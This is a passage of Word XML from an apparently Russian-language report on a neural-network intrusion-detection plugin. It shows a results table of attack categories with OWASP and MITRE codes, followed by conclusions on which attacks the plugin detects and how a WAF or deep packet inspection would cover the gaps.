            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A7B3C30"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89</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24C0C18D"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237</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD74AB" w:rsidRPr="00BD74AB" w14:paraId="5AEEDB87" w14:textId="77777777" w:rsidTr="00BD74AB">
        <w:trPr>
          <w:trHeight w:val="615"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25620A54"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Контроль доступа</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D330D2F"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A01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A8DA7A7"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T1078</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57659ADE"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FF31162"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33</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD74AB" w:rsidRPr="00BD74AB" w14:paraId="63FFBB8C" w14:textId="77777777" w:rsidTr="00BD74AB">
        <w:trPr>
          <w:trHeight w:val="615"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1868BEDC"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Перехват трафика</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="056EB838"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A02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="039DFBF6"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T1557</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5ED7C802"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1720E50C"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD74AB" w:rsidRPr="00BD74AB" w14:paraId="573E834E" w14:textId="77777777" w:rsidTr="00BD74AB">
        <w:trPr>
          <w:trHeight w:val="315"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64CAE0EB"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Log4Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56238943"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A09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C55ACC7"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T1562</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DD2152C"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F8332BF"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD74AB" w:rsidRPr="00BD74AB" w14:paraId="26B72B0B" w14:textId="77777777" w:rsidTr="00BD74AB">
        <w:trPr>
          <w:trHeight w:val="915"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="144030D7"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Перебор директорий</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D9E51FD"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A05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DBC455B"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T1083</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ABD8401"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47</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="537E134C"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210</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD74AB" w:rsidRPr="00BD74AB" w14:paraId="24341512" w14:textId="77777777" w:rsidTr="00BD74AB">
        <w:trPr>
          <w:trHeight w:val="915"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BFB1611"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 xml:space="preserve">HTTP </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BD74AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Fuzzing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BD74AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BD74AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>ffuf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BD74AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A8A788B"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A03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D3F5BB1"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T1190</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42AD5E0E"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FFE273D"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121</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD74AB" w:rsidRPr="00BD74AB" w14:paraId="02F7B05E" w14:textId="77777777" w:rsidTr="00BD74AB">
        <w:trPr>
          <w:trHeight w:val="960"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D191912"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Извлечение данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46E3B6F5"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A05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28EEB2BE"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T1041</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="684BDF6A"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41C6CEC8"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50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD74AB" w:rsidRPr="00BD74AB" w14:paraId="4E7E6535" w14:textId="77777777" w:rsidTr="00BD74AB">
        <w:trPr>
          <w:trHeight w:val="645"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7335B43A"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 xml:space="preserve">Медленный </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BD74AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>DoS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E500A1C"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A05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FA0BA74"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T1499</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="241DA55F"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="205DEDF4"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50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD74AB" w:rsidRPr="00BD74AB" w14:paraId="372990DC" w14:textId="77777777" w:rsidTr="00BD74AB">
        <w:trPr>
          <w:trHeight w:val="645"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61FD8B9A"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Загрузка файлов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56E17B9E"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A04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23505316"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T1505</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B90420A"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48426BAC"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD74AB" w:rsidRPr="00BD74AB" w14:paraId="116A8B7F" w14:textId="77777777" w:rsidTr="00BD74AB">
        <w:trPr>
          <w:trHeight w:val="330"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50A70690"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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BD74AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Nikto</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32B39675"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A06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E9FDFAC"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T1595</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="465482CE"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89</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="332AF0F4"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121</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD74AB" w:rsidRPr="00BD74AB" w14:paraId="1A73CF3D" w14:textId="77777777" w:rsidTr="00BD74AB">
        <w:trPr>
          <w:trHeight w:val="406"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F764C39"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SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3856EC51"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A10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79B4AF72"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T1090</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23BBA852"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="713507A9" w14:textId="77777777" w:rsidR="00BD74AB" w:rsidRPr="00BD74AB" w:rsidRDefault="00BD74AB" w:rsidP="00BD74AB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD74AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="459D2A8C" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3976199F" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Проведённые тесты позволяют сделать выводы о применимости нейросетевого плагина при различных типах атак. Наибольшую эффективность плагин демонстрирует при атаках с характерным сетевым поведением — высокочастотных атаках типа отказа в обслуживании, переборе паролей по протоколу SSH, сканировании портов и автоматизированном переборе директорий. В этих случаях статистические характеристики потоков </w:t>
      </w:r>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">существенно отличаются от нормального трафика, что позволяет модели уверенно классифицировать их как аномалию. Напротив, плагин неэффективен при атаках на уровне приложения — медленном переборе паролей через веб-формы, атаках типа SSRF через единичный запрос, а также эксплуатации уязвимостей типа Log4Shell. Все эти атаки реализуются через единичные или редкие запросы, метаданные которых неотличимы от обычного трафика. Для их обнаружения необходима глубокая инспекция содержимого пакетов или специализированные сигнатурные правила </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1250781B" w14:textId="6DD8106F" w:rsidR="0084241A" w:rsidRPr="00532842" w:rsidRDefault="0084241A" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084241A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Для закрытия данного вектора атак необходимо применение дополнительных средств защиты, работающих на уровне содержимого запросов. Первым вариантом является глубокая инспекция пакетов (Deep Packet </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084241A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Inspection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084241A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, DPI)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, а в</w:t>
      </w:r>
      <w:r w:rsidRPr="0084241A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">торым межсетевой экран уровня приложений (Web Application Firewall, WAF), в частности </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084241A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ModSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084241A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> с набором правил OWASP Core </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084241A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Rule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084241A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084241A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084241A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CRS), который содержит готовые сигнатуры для обнаружения SSRF. Совместное использование нейросетевого плагина с WAF или настроенным DPI позволяет сформировать эшелонированную защиту, покрывающую как поведенческие аномалии на уровне потоков, так и атаки, реализуемые через единичные вредоносные запросы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C1BDA9" w14:textId="5F80ED4C" w:rsidR="008E0171" w:rsidRPr="00532842" w:rsidRDefault="008E0171" w:rsidP="00BD6272">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Основным направлением улучшения модели является дообучение на трафике конкретной защищаемой сети. Текущая модель обучена на наборе данных CIC-IDS, который не отражает особенности трафика реальных производственных систем. Сбор и разметка трафика в течение нескольких недель нормальной работы системы позволит существенно снизить уровень ложных срабатываний. Дополнительно можно рассмотреть расширение набора признаков — добавление характеристик прикладного уровня, таких как коды ответов HTTP и длина заголовков, что позволит обнаруживать </w:t>
      </w:r>
      <w:r w:rsidR="00CD546F" w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>атаки,</w:t>
      </w:r>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> которые сейчас остаются незамеченными.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D95A827" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00532842" w:rsidRDefault="008E0171" w:rsidP="00BD6272">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Текущая интеграция с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00532842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
